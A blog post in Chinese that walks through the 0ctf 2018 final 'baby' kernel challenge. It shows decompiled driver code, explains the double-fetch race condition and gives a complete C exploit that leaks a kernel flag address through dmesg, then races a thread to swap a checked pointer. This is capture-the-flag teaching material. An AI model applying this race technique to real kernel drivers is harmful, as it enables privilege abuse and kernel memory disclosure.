kernel_pwn Double_fetch

kernel_pwn Double_fetch

wiki上kernel部分的第三道题目,来自0ctf2018 final_baby

这题不太一样的是没有给bzlmage,只给了.ko文件和core.cpio。通过ida打开ko文件查看hex view可以发现内核版本为4.15.0-22-generic SMP mod_unload。
我偷懒直接从p4nda师傅的github上搞了一个,写个shell文件就可以qemu起了。

.ko文件分析:

1
2
3
4
5
6
__int64 init_module()
{
  _fentry__();
  misc_register(&baby);
  return 0LL;
}

init_module()里执行了misc_register()在/dev目录下建立了baby结点,并定义为杂项设备,该设备共享主设备号和open函数调用,有点类似上一篇的core。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
__int64 __fastcall baby_ioctl(__int64 a1, int a2)
{
  __int64 v2; // rdx
  __int64 v3; // rcx
  __int64 result; // rax
  unsigned __int64 v5; // kr10_8
  int i; // [rsp-5Ch] [rbp-5Ch]
  __int64 v7; // [rsp-58h] [rbp-58h]

  _fentry__();
  v7 = v2;
  if ( a2 == 0x6666 )
  {
    printk("Your flag is at %px! But I don't think you know it's content\n", flag, v2, v3);
    result = 0LL;
  }
  else if ( a2 == 0x1337
         && (unsigned __int8)_chk_range_not_ok(
                               v2,
                               16LL,
                               *(_QWORD *)(__readgsqword((unsigned __int64)&current_task) + 4952)) != 1
         && (unsigned __int8)_chk_range_not_ok(
                               *(_QWORD *)v7,
                               *(int *)(v7 + 8),
                               *(_QWORD *)(__readgsqword((unsigned __int64)&current_task) + 4952)) != 1
         && *(_DWORD *)(v7 + 8) == strlen(flag) )
  {
    for ( i = 0; ; ++i )
    {
      v5 = strlen(flag) + 1;
      if ( i >= v5 - 1 )
        break;
      if ( *(_BYTE *)(*(_QWORD *)v7 + i) != flag[i] )
        return 22LL;
    }
    printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag, flag, ~v5);
    result = 0LL;
  }
  else
  {
    result = 14LL;
  }
  return result;
}

baby_ioctl()就类似于main函数了,主要完成的功能是对第二个参数进行检查,若为0x6666,就输出内核里flag的地址;如果为0x1337就会进行三个检查_chk_range_not_ok()函数就是检查a1+a2>a3是否成立。

寄存器状态:

1
2
3
4
5
6
$rdx   : 0x00007ffffffff000  →  0x00007ffffffff000
$rsi   : 0x0000000000000010  →  0x0000000000000010
$rdi   : 0x00007ffd64e1d780  →  0x00007ffd64e1d790  →  0x6373205d30383138  →  0x6373205d30383138

gef➤  x/20gx 0x00007ffd64e1d780
0x7ffd64e1d780:	0x00007ffd64e1d790	0x0000000000000021   //传入的结构体

通过调试我们可以发现,v2/v7就是是我们传入的结构体,而a3则是一个固定的地址0x7ffffffff000,这个地址是用户空间和内核空间的边界地址,因此我们可以想到该函数就是判断a1+a2的是否在用户空间。
结构体:

1
2
3
4
struct attr{
    char *flag;   //flag的地址
    size_t flag_len;
};

第一个check是我们输入的结构体是否在用户空间,第二个check是flag是否在用户空间,第三个check是我们结构体的flag_len是否和真正flag长度相等。
过了check之后会将我们输入的flag的地址里的内容和内核里的flag进行比较,相同最终就会输出flag。
分析下来我们发现,内核得到的是一个结构体的指针,而结构体的内容是存放在用户空间的。我们可以先通过0x6666得到flag在内核里的地址,但如果我们在传入的结构体里写入该地址的话就无法通过第二个check(因为该flag在内核空间)。这里就用到了doubel_fetch方法。
原理摘自CTF_WIKI:

1
2
3
Double Fetch 从漏洞原理上属于条件竞争漏洞,是一种内核态与用户态之间的数据访问竞争。

在 Linux 等现代操作系统中,虚拟内存地址通常被划分为内核空间和用户空间。内核空间负责运行内核代码、驱动模块代码等,权限较高。而用户空间运行用户代码,并通过系统调用进入内核完成相关功能。通常情况下,用户空间向内核传递数据时,内核先通过通过 copy_from_user 等拷贝函数将用户数据拷贝至内核空间进行校验及相关处理,但在输入数据较为复杂时,内核可能只引用其指针,而将数据暂时保存在用户空间进行后续处理。此时,该数据存在被其他恶意线程篡改风险,造成内核验证通过数据与实际使用数据不一致,导致内核代码执行异常。

因此我们可以先在结构体的flag位置写入用户空间的地址,在创建一个恶意线程,该线程的任务就是不断的修改我们的flag地址为内核地址,如果该修改操作发生在通过check后,那么就可以通过后面的依次比较从而输出flag。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
#include<sys/ioctl.h>
#include<sys/stat.h>
#include<fcntl.h>
#include<inttypes.h>
#include<pthread.h>

int finish=0;
uint64_t addr;

struct attr{
    char *flag;
    int len;
};

void change_attr(void *s){
    struct attr *s1=s;
    if(finish==0){
        s1->flag=addr;
    }
}

int main(){
    char buf[0x1000]={0};
    char *ptr;
    struct attr t;
    pthread_t t1;
    int fd=open("/dev/baby",0);
    ioctl(fd,0x6666);
    setvbuf(stdin,0,2,0);
    setvbuf(stdout,0,2,0);
    setvbuf(stderr,0,2,0);
    system("dmesg > /tmp/record.txt");
    int addr_fd=open("/tmp/record.txt",O_RDONLY);
    lseek(addr_fd,-0x1000,SEEK_END);   //control the position of r/w
    read(addr_fd,buf,0x1000);
    close(addr_fd);
    ptr=strstr(buf,"Your flag is at ");
    if(ptr==0){
        puts("Not found");
        exit(0);
    }
    else{
        ptr+=16;
        addr=strtoull(ptr,ptr+16,16);
        printf("flag addr: %p",addr);
    }
    t.flag=buf;
    t.len=33;
    pthread_create(&t1,NULL,change_attr,&t);   //创建线程
    for(int i=0;i<0x500;i++){
        ioctl(fd,0x1337,&t);
        t.flag=buf;     //更新flag地址增大成功概率
    }
    finish=1;
    pthread_join(t1,NULL);   //等待线程结束
    close(fd);
    system("dmesg | grep flag");
    
    return 0;

}

补充:
编译时要多加-pthread选项gcc exp.c -pthread -static -o exploit
gef attach的命令gef-remote -q localhost:1234
关闭地址随机化方法:
在-append最后加上 nokaslr

参考:
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/double-fetch-zh/
https://x3h1n.github.io/2019/08/27/20180ctf-final-baby/

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

Pwner<br>CTF is a part of my life.<br>